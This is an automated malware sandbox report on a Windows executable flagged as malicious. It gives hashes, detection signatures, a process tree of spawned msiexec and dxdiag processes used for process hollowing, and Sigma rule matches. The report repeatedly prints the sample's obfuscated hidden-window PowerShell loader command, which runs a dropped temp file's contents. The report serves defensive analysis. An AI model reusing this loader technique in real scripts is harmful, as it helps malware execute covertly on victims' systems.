Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
vfhlZ0vrbe.exe

Overview

General Information

Sample name:vfhlZ0vrbe.exe
Analysis ID:1588706
MD5:d29c88c314347eb87810e85e1e90a1f1
SHA1:37082bccbde394171014c6a23ba59867fd0db181
SHA256:122e9453d8424952667d1fbac82b31ccf2ab4076d14f306d1d97d675bc6fe213
Infos:

Detection

Score:76
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Found suspicious powershell code related to unpacking or dynamic code loading
Loading BitLocker PowerShell Module
Sample uses process hollowing technique
Sigma detected: Suspicious Script Execution From Temp Folder
Suspicious powershell command line found
Contains functionality for read data from the clipboard
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files

Classification

Process Tree

  • System is w10x64native
  • vfhlZ0vrbe.exe (PID: 7208 cmdline: "C:\Users\user\Desktop\vfhlZ0vrbe.exe" MD5: D29C88C314347EB87810E85E1E90A1F1)
    • powershell.exe (PID: 3460 cmdline: powershell.exe -windowstyle hidden "$Lotteris=gc -raw 'C:\Users\user\AppData\Local\Temp\Gutturotetany\dearth\beccabunga.Heg';$Kogers=$Lotteris.SubString(12754,3);.$Kogers($Lotteris) " MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6868 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • msiexec.exe (PID: 2080 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 3036 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 7648 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 6160 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 3436 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 7964 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 4408 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 7096 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 1792 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 7636 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • dxdiag.exe (PID: 8020 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
      • dxdiag.exe (PID: 2240 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
      • dxdiag.exe (PID: 8124 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
      • dxdiag.exe (PID: 6060 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
      • dxdiag.exe (PID: 3400 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
      • dxdiag.exe (PID: 7192 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
      • dxdiag.exe (PID: 5640 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
      • dxdiag.exe (PID: 4056 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
      • dxdiag.exe (PID: 2444 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
      • dxdiag.exe (PID: 1480 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
      • dxdiag.exe (PID: 2400 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
      • msiexec.exe (PID: 2772 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 8072 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 3288 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 6728 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 5376 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 6516 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 1180 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 6520 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 1252 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 6784 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • dxdiag.exe (PID: 6208 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
      • dxdiag.exe (PID: 8032 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
      • dxdiag.exe (PID: 6736 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
      • dxdiag.exe (PID: 6740 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
      • dxdiag.exe (PID: 5280 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
      • dxdiag.exe (PID: 2560 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
      • dxdiag.exe (PID: 8120 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

System Summary

barindex
Sigma detected: Suspicious Script Execution From Temp Folder
Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: powershell.exe -windowstyle hidden "$Lotteris=gc -raw 'C:\Users\user\AppData\Local\Temp\Gutturotetany\dearth\beccabunga.Heg';$Kogers=$Lotteris.SubString(12754,3);.$Kogers($Lotteris) ", CommandLine: powershell.exe -windowstyle hidden "$Lotteris=gc -raw 'C:\Users\user\AppData\Local\Temp\Gutturotetany\dearth\beccabunga.Heg';$Kogers=$Lotteris.SubString(12754,3);.$Kogers($Lotteris) ", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\vfhlZ0vrbe.exe", ParentImage: C:\Users\user\Desktop\vfhlZ0vrbe.exe, ParentProcessId: 7208, ParentProcessName: vfhlZ0vrbe.exe, ProcessCommandLine: powershell.exe -windowstyle hidden "$Lotteris=gc -raw 'C:\Users\user\AppData\Local\Temp\Gutturotetany\dearth\beccabunga.Heg';$Kogers=$Lotteris.SubString(12754,3);.$Kogers($Lotteris) ", ProcessId: 3460, ProcessName: powershell.exe
Sigma detected: Non Interactive PowerShell Process Spawned
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -windowstyle hidden "$Lotteris=gc -raw 'C:\Users\user\AppData\Local\Temp\Gutturotetany\dearth\beccabunga.Heg';$Kogers=$Lotteris.SubString(12754,3);.$Kogers($Lotteris) ", CommandLine: powershell.exe -windowstyle hidden "$Lotteris=gc -raw 'C:\Users\user\AppData\Local\Temp\Gutturotetany\dearth\beccabunga.Heg';$Kogers=$Lotteris.SubString(12754,3);.$Kogers($Lotteris) ", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\vfhlZ0vrbe.exe", ParentImage: C:\Users\user\Desktop\vfhlZ0vrbe.exe, ParentProcessId: 7208, ParentProcessName: vfhlZ0vrbe.exe, ProcessCommandLine: powershell.exe -windowstyle hidden "$Lotteris=gc -raw 'C:\Users\user\AppData\Local\Temp\Gutturotetany\dearth\beccabunga.Heg';$Kogers=$Lotteris.SubString(12754,3);.$Kogers($Lotteris) ", ProcessId: 3460, ProcessName: powershell.exe

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus / Scanner detection for submitted sample
Source: vfhlZ0vrbe.exeAvira: detected
Multi AV Scanner detection for submitted file
Source: vfhlZ0vrbe.exeVirustotal: Detection: 61%Perma Link
Source: vfhlZ0vrbe.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: vfhlZ0vrbe.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\vfhlZ0vrbe.exeCode function: 0_2_00405A4F GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_00405A4F
Source: C:\Users\user\Desktop\vfhlZ0vrbe.exeCode function: 0_2_00406620 FindFirstFileA,FindClose,0_2_00406620
Source: C:\Users\user\Desktop\vfhlZ0vrbe.exeCode function: 0_2_004027CF FindFirstFileA,0_2_004027CF
Source: vfhlZ0vrbe.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: vfhlZ0vrbe.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: C:\Users\user\Desktop\vfhlZ0vrbe.exeCode function: 0_2_0040550F GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_0040550F
Source: C:\Users\user\Desktop\vfhlZ0vrbe.exeCode function: 0_2_004033D8 EntryPoint,SetErrorMode,GetVersionExA,GetVersionExA,GetVersionExA,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,ExitProcess,CoUninitialize,ExitProcess,lstrlenA,wsprintfA,GetFileAttributesA,DeleteFileA,SetCurrentDirectoryA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004033D8
Source: C:\Users\user\Desktop\vfhlZ0vrbe.exeFile created: C:\Windows\resources\0409Jump to behavior
Source: C:\Users\user\Desktop\vfhlZ0vrbe.exeCode function: 0_2_004073180_2_00407318
Source: C:\Users\user\Desktop\vfhlZ0vrbe.exeCode function: 0_2_00406AFA0_2_00406AFA
Source: vfhlZ0vrbe.exeStatic PE information: invalid certificate
Source: vfhlZ0vrbe.exe, 00000000.00000000.16247324063.0000000000443000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameunarmoureds navigatrerne.exeh$ vs vfhlZ0vrbe.exe
Source: vfhlZ0vrbe.exeBinary or memory string: OriginalFilenameunarmoureds navigatrerne.exeh$ vs vfhlZ0vrbe.exe
Source: vfhlZ0vrbe.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: classification engineClassification label: mal76.evad.winEXE@4304/15@0/0
Source: C:\Users\user\Desktop\vfhlZ0vrbe.exeCode function: 0_2_004033D8 EntryPoint,SetErrorMode,GetVersionExA,GetVersionExA,GetVersionExA,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,ExitProcess,CoUninitialize,ExitProcess,lstrlenA,wsprintfA,GetFileAttributesA,DeleteFileA,SetCurrentDirectoryA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004033D8
Source: C:\Users\user\Desktop\vfhlZ0vrbe.exeCode function: 0_2_00404805 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_00404805
Source: C:\Users\user\Desktop\vfhlZ0vrbe.exeCode function: 0_2_00402198 CoCreateInstance,MultiByteToWideChar,0_2_00402198
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6868:304:WilStaging_02
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6868:120:WilError_03
Source: C:\Users\user\Desktop\vfhlZ0vrbe.exeFile created: C:\Users\user\AppData\Local\Temp\nsp40B5.tmpJump to behavior
Source: vfhlZ0vrbe.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
Source: C:\Users\user\Desktop\vfhlZ0vrbe.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\vfhlZ0vrbe.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: vfhlZ0vrbe.exeVirustotal: Detection: 61%
Source: C:\Users\user\Desktop\vfhlZ0vrbe.exeFile read: C:\Users\user\Desktop\vfhlZ0vrbe.exeJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\vfhlZ0vrbe.exe "C:\Users\user\Desktop\vfhlZ0vrbe.exe"
Source: C:\Users\user\Desktop\vfhlZ0vrbe.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Lotteris=gc -raw 'C:\Users\user\AppData\Local\Temp\Gutturotetany\dearth\beccabunga.Heg';$Kogers=$Lotteris.SubString(12754,3);.$Kogers($Lotteris) "
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
Source: C:\Users\user\Desktop\vfhlZ0vrbe.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Lotteris=gc -raw 'C:\Users\user\AppData\Local\Temp\Gutturotetany\dearth\beccabunga.Heg';$Kogers=$Lotteris.SubString(12754,3);.$Kogers($Lotteris) "Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
